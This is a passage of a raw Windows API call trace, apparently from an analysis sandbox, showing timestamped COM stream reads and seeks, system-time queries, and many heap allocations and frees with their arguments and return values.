GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74eee0 | out: lpSystemTimeAsFileTime=0x74eee0*(dwLowDateTime=0x3fd115a0, dwHighDateTime=0x1d661be)) [0265.786] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f228, cb=0x4, pcbRead=0x74efe4 | out: pv=0x74f228*=0x17, pcbRead=0x74efe4*=0x4) returned 0x0 [0265.786] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f254, cb=0x6e, pcbRead=0x74efe4 | out: pv=0x74f254*=0xf9, pcbRead=0x74efe4*=0x6e) returned 0x0 [0265.787] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74eee0 | out: lpSystemTimeAsFileTime=0x74eee0*(dwLowDateTime=0x3fd13cb0, dwHighDateTime=0x1d661be)) [0265.787] IStream:RemoteSeek (in: This=0xba6520, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f218, cb=0x4, pcbRead=0x74efe4 | out: pv=0x74f218*=0xbc, pcbRead=0x74efe4*=0x4) returned 0x0 [0265.787] IStream:RemoteSeek (in: This=0xba6520, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f220, cb=0x4, pcbRead=0x74efe4 | out: pv=0x74f220*=0x6b, pcbRead=0x74efe4*=0x4) returned 0x0 [0265.787] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74eee0 | out: lpSystemTimeAsFileTime=0x74eee0*(dwLowDateTime=0x3fd13cb0, dwHighDateTime=0x1d661be)) [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f228, cb=0x4, pcbRead=0x74efe4 | out: pv=0x74f228*=0xaf, pcbRead=0x74efe4*=0x4) returned 0x0 [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f010, cb=0x26, pcbRead=0x74efe4 | out: pv=0x74f010*=0xe6, pcbRead=0x74efe4*=0x26) returned 0x0 [0265.787] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74eee0 | out: lpSystemTimeAsFileTime=0x74eee0*(dwLowDateTime=0x3fd13cb0, dwHighDateTime=0x1d661be)) [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f228, cb=0x4, pcbRead=0x74efe4 | out: pv=0x74f228*=0x1b, pcbRead=0x74efe4*=0x4) returned 0x0 [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f254, cb=0x76, pcbRead=0x74efe4 | out: pv=0x74f254*=0x6b, pcbRead=0x74efe4*=0x76) returned 0x0 [0265.787] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74eee0 | out: lpSystemTimeAsFileTime=0x74eee0*(dwLowDateTime=0x3fd13cb0, dwHighDateTime=0x1d661be)) [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f8db, cb=0x1, pcbRead=0x74f22c | out: pv=0x74f8db*=0x1, pcbRead=0x74f22c*=0x1) returned 0x0 [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f8d4, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f8d4*=0x86, pcbRead=0x74f22c*=0x4) returned 0x0 [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f8d4, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f8d4*=0xe4, pcbRead=0x74f22c*=0x4) returned 0x0 [0265.787] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0x74f8d4, cb=0x4, pcbRead=0x74f22c | out: pv=0x74f8d4*=0x48, pcbRead=0x74f22c*=0x4) returned 0x0 [0265.787] IStream:RemoteSeek (in: This=0xba6520, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0265.787] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x27c58) returned 0xbc41e0 [0265.788] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x923a) returned 0xbaadc8 [0265.788] ISequentialStream:RemoteRead (in: This=0xba6520, pv=0xbaadc8, cb=0x923a, pcbRead=0x74f22c | out: pv=0xbaadc8*=0x6d, pcbRead=0x74f22c*=0x923a) returned 0x0 [0265.789] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x74f128 | out: lpSystemTimeAsFileTime=0x74f128*(dwLowDateTime=0x3fd18ad0, dwHighDateTime=0x1d661be)) [0265.790] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20000) returned 0xbebe40 [0265.791] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10000) returned 0xc0be48 [0265.792] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10000) returned 0xc1be50 [0265.810] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbebe40 | out: hHeap=0xb80000) returned 1 [0265.810] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc0be48 | out: hHeap=0xb80000) returned 1 [0265.810] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xc1be50 | out: hHeap=0xb80000) returned 1 [0265.810] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaadc8 | out: hHeap=0xb80000) returned 1 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x82e4) returned 0xbaadc8 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1c) returned 0xba6570 [0265.810] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba6570 | out: hHeap=0xb80000) returned 1 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6570 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa6f0 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6598 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa768 [0265.810] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa6f0 | out: hHeap=0xb80000) returned 1 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xa) returned 0xbaa6f0 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa780 [0265.810] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5450 [0265.810] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa780 | out: hHeap=0xb80000) returned 1 [0265.811] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba5450 | out: hHeap=0xb80000) returned 1 [0265.812] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa6f0 | out: hHeap=0xb80000) returned 1 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa6f0 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1e) returned 0xba65c0 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa780 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba65e8 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5450 [0265.812] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba65c0 | out: hHeap=0xb80000) returned 1 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa798 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa7b0 [0265.812] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa780 | out: hHeap=0xb80000) returned 1 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa780 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa7c8 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa7e0 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa7f8 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5460 [0265.812] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa7c8 | out: hHeap=0xb80000) returned 1 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa7c8 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa810 [0265.812] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa7e0 | out: hHeap=0xb80000) returned 1 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa7e0 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa828 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa840 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa858 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5470 [0265.812] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa828 | out: hHeap=0xb80000) returned 1 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa828 [0265.812] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa870 [0265.812] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa840 | out: hHeap=0xb80000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa840 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5480 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa888 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa8a0 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb30d0 [0265.813] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba5480 | out: hHeap=0xb80000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa8b8 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa8d0 [0265.813] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa888 | out: hHeap=0xb80000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xb922d0 [0265.813] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba6570 | out: hHeap=0xb80000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa888 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x12) returned 0xbaa628 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa8e8 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6570 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xba5480 [0265.813] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa628 | out: hHeap=0xb80000) returned 1 [0265.813] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa900 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa918 [0265.814] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa8e8 | out: hHeap=0xb80000) returned 1 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa8e8 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xa) returned 0xbaa930 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa948 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb30e0 [0265.814] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa948 | out: hHeap=0xb80000) returned 1 [0265.814] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb30e0 | out: hHeap=0xb80000) returned 1 [0265.814] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa930 | out: hHeap=0xb80000) returned 1 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa930 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa948 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xe) returned 0xbaa960 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa978 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa990 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb30e0 [0265.814] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa960 | out: hHeap=0xb80000) returned 1 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa960 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaa9a8 [0265.814] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa978 | out: hHeap=0xb80000) returned 1 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa978 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa9c0 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x80) returned 0xbb34b8 [0265.814] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xb922d0 | out: hHeap=0xb80000) returned 1 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa9d8 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa9f0 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaaa08 [0265.814] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaaa20 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb30f0 [0265.815] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa9f0 | out: hHeap=0xb80000) returned 1 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaa9f0 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaaa38 [0265.815] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa08 | out: hHeap=0xb80000) returned 1 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaaa08 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaaa50 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaaa68 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xe) returned 0xbaaa80 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaaa98 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbaaab0 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3100 [0265.815] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa80 | out: hHeap=0xb80000) returned 1 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaaa80 [0265.815] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3558 [0265.815] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaaa98 | out: hHeap=0xb80000) returned 1 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbaaa98 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3570 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3588 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x14) returned 0xbaa628 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb35a0 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba65c0 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3110 [0265.816] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbaa628 | out: hHeap=0xb80000) returned 1 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb35b8 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb35d0 [0265.816] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb35a0 | out: hHeap=0xb80000) returned 1 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb35a0 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb35e8 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3600 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3618 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3630 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3648 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3120 [0265.816] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3618 | out: hHeap=0xb80000) returned 1 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3618 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3660 [0265.816] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3630 | out: hHeap=0xb80000) returned 1 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3630 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3678 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x100) returned 0xbb3940 [0265.816] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb34b8 | out: hHeap=0xb80000) returned 1 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3690 [0265.816] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6610 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb36a8 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6638 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3130 [0265.817] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba6610 | out: hHeap=0xb80000) returned 1 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb36c0 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb36d8 [0265.817] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb36a8 | out: hHeap=0xb80000) returned 1 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb36a8 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x2) returned 0xbb3140 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb36f0 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3708 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3150 [0265.817] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3140 | out: hHeap=0xb80000) returned 1 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3720 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3738 [0265.817] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb36f0 | out: hHeap=0xb80000) returned 1 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb36f0 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1c) returned 0xba6610 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3750 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xba6660 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xbb3140 [0265.817] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xba6610 | out: hHeap=0xb80000) returned 1 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3768 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3780 [0265.817] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbb3750 | out: hHeap=0xb80000) returned 1 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3750 [0265.817] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3798 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37b0 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37c8 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37e0 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xac) returned 0xbb3a48 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb37f8 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3810 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3828 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3840 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3858 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3870 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3888 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb38a0 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb38b8 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb38d0 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb38e8 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3900 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3918 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3b18 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3b30 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3b48 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3b60 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3b78 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3b90 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3ba8 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3bc0 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3bd8 [0265.818] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3bf0 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3c08 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3c20 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3c38 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3c50 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3c68 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3c80 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3c98 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3cb0 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3cc8 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3ce0 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3cf8 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3d10 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3d28 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3d40 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3d58 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3d70 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3d88 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3da0 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3db8 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3dd0 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3de8 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3e00 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3e18 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3e30 [0265.819] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3e48 [0265.820] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3e60 [0265.820] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xbb3e78 [0265.820] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xbb3e90 [0265.820] RtlAllocateHeap 